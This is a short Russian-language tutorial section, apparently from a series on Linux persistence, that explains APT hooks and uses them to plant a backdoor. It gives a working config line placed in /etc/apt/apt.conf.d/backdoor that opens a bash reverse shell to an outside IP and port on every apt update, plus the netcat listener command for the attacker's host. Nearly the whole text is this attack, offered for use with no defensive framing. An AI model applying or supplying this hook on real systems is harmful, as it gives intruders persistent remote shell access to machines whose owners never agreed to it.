09 - APT

APT — менеджер пакетов в системах на базе Debian. У APT и других менеджеров пакетов есть концепция под названием «hook», которая используется для каких-либо действий до установки пакетов, после установки, удаления или обновления. Возможностью хуков мы и воспользуемся. Мы создадим хук, который будет отдавать на reverse shell каждый раз когда сработает триггер update.

// Правим /etc/apt/apt.conf.d/backdoor
APT::Update::Pre-Invoke {"bash -c 'bash -i >& /dev/tcp/192.168.140.128/9010 0>&1'"};

// Не забываем поднять на хосте атакующего netcat
nc -nvl 9010

Теперь при каждой попытке обновить систему (apt update / apt-get update) мы будем получать шелл.